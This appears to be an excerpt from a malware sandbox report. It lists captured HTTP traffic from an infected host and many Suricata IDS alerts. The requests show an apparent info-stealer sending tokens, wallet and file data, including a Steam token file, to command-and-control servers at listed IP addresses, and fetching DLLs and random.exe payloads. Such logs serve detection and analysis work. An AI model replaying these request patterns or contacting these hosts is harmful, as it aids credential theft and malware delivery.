                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 2d 2d 0d 0a Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file"------KEGDAKEHJDHIDHJJDAEC--
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 33185Content-Type: multipart/form-data; boundary=------------------------ci1ASTSkLc010whmSgp6nPData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 69 31 41 53 54 53 6b 4c 63 30 31 30 77 68 6d 53 67 70 36 6e 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 75 77 6f 67 75 76 69 67 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a a9 c6 c2 ac bc 9f 87 cf 5d 3f 84 4a 18 42 9c 4b 68 88 9d 0f 2a 17 41 2e 0b a5 a0 78 aa ee 0b 10 20 27 7a 2d 54 47 bd c5 7e f1 7c 9d fe d4 22 45 dd 9a 6d 18 44 9a 7c 80 43 d5 44 10 2e 00 63 fb 7b b7 41 25 cb ff a9 c8 23 4a 2f db a0 e3 03 21 da 12 b7 b3 65 03 19 08 46 70 e7 dd 32 17 a8 34 33 24 f8 54 a3 f1 30 3a 8c 80 a0 ec b3 72 18 f8 fc 2c 0c 3c 88 ce 28 a5 1d ea ad f8 00 3e 66 a4 d0 38 cf dc ef 7e 27 65 e1 be ed 30 f6 e9 41 7d af 63 76 07 15 ad 59 0b 31 76 64 8d 97 11 16 8c 12 0f e5 99 78 d5 68 aa e8 6e 44 23 2a 3c 64 c4 ef 39 22 c4 31 5b 06 65 3b c4 b0 e9 f6 12 35 88 47 3f 11 08 b1 99 8f 2b 22 67 16 d8 38 f0 d8 f1 4e 74 3c 5c 98 f3 1e 94 ba 5c 86 4e 24 bf 29 f3 0b 12 a2 48 7e bd 10 91 72 95 bc 45 25 3b b3 cd 83 ab 04 f0 b8 cb d8 3c d2 ba dd 52 29 f6 2f 25 5b 9d be a3 01 27 1f 3e 94 6e d2 b4 b4 fa 1a 64 d1 d2 b0 f4 83 ba 65 0b 83 f0 62 5e 3f 63 a9 64 0d 67 5f f8 5c 60 67 92 ef 9a 11 4d d8 57 5d 8f 39 e6 00 0b cd 6b 2c ba 10 c7 f8 4d f4 da a1 30 fc dd 7d e6 d8 83 32 12 7d 58 37 31 46 97 d5 18 53 29 42 fa 5b 78 04 a7 ba be 4b e4 2c 40 82 1e a0 45 4c b2 52 75 8d d7 16 dd 6f c0 41 16 92 53 6f 1b e3 94 4a ef 37 f5 55 db 27 22 4b a0 d3 e2 5b bc 93 43 9b fc ef 29 30 30 e9 05 f1 a6 a6 17 6e fa 79 cd a5 9b 7c 76 9e ee 53 0e 7f d7 ad 89 4e ab be 89 68 87 31 e5 0c a1 df 2c 93 59 d0 9d e2 86 c5 05 06 c2 14 7b 5d be 2a e8 40 bf 35 8d d9 f2 8d db bf 24 c2 a4 72 d5 d9 59 6b ab e3 0a b9 dc 0f 2b 5c bb d2 ef 32 8a 3d f7 f6 5f 08 8e 39 9a f8 77 68 75 ad ec 1e 2e 4d 05 00 59 23 07 0e 47 a4 de 41 af 6b 29 58 69 3e 21 33 c0 85 66 3e 23 cd 45 b0 82 10 6d 13 b5 44 3e 87 ea 2f 6f 75 ad cb 8e f3 48 f4 e0 cd 48 9d 49 d3 47 db 9d 6f 83 c5 6d 47 fd 34 3e 70 93 67 88 4e 4a b3 8d d6 15 6e 17 29 d2 ba 57 93 25 6d e9 93 a8 79 f7 21 f7 21 85 73 a0 1e 8f 36 11 80 8b 1c 95 ba 95 2b 86 2a 09 53 b8 8f 8d 88 7c 86 10 11 d5 e9 17 31 ae 18 e5 29 dc 22 c9 a6 27 2b a3 96 1c 7d 48 ad 56 bb cb bc 7a f7 ef 4a 75 93 0e e3 71 09 bc 3e 2e 8c f4 15 63 e1 f3 f0 c0 35 3e 85 4b cf 44 31 05 b0 cb a4 c6 b8 8c 7b ad c6 0a 81 cb f4 f1 9d dd 5d 20 2d c4 31 fa 9e 73 b3 e5 c0 71 8d b7 c9 67 18 b4 e4 49 ee 6c d7 37 19 f5 0c e6 53 19 db 50 44 37 5e ae 74 29 82 44 59 8d c0 bf ab 01 26 0f 24 56 9e 21 1b 00 d6 2b c6 cb 2a bb 05 1a 3f 3c 2d fb 20 91 9f cd 9e e9 3e 5c dd 05 50 d9 e8 e7 b0 6c d0 95 5f c8 5b ee 97 ac 4a 5f 7a 38 96 9a d7 8c a5
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019675001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019676001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGHHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="message"wallets------CFCBFBGDBKJKECAAKKFH--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBAHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 2d 2d 0d 0a Data Ascii: ------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="message"files------EBAKEBAECGCBAAAAAEBA--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHIDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 43 46 49 44 48 49 44 47 49 44 48 4a 45 48 49 44 2d 2d 0d 0a Data Ascii: ------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IIEHCFIDHIDGIDHJEHIDContent-Disposition: form-data; name="file"------IIEHCFIDHIDGIDHJEHID--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 2d 2d 0d 0a Data Ascii: ------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------FIDHIEBAAKJDHIECAAFHContent-Disposition: form-data; name="message"ybncbhylepme------FIDHIEBAAKJDHIECAAFH--
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019677001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49794 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49795 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49793 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49797 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49798 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49799 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49804 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49805 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49813 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49811 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49822 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49823 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49830 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49834 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49836 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49839 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49857 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49861 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49864 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49868 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49867 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49863 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49874 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49880 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49879 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49894 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49898 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49893 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49902 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49907 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49911 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49922 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49927 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49926 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49942 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49944 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49946 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49948 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49949 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49928 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49954 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49915 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49957 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49959 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49964 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49965 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49969 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49970 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49958 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49984 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49987 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49995 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49990 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50006 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49999 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50007 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50034 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50020 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50044 -> 185.215.113.16:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50051 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50055 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50059 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50066 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50068 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50079 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50082 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50091 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50096 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50094 -> 172.67.209.202:443
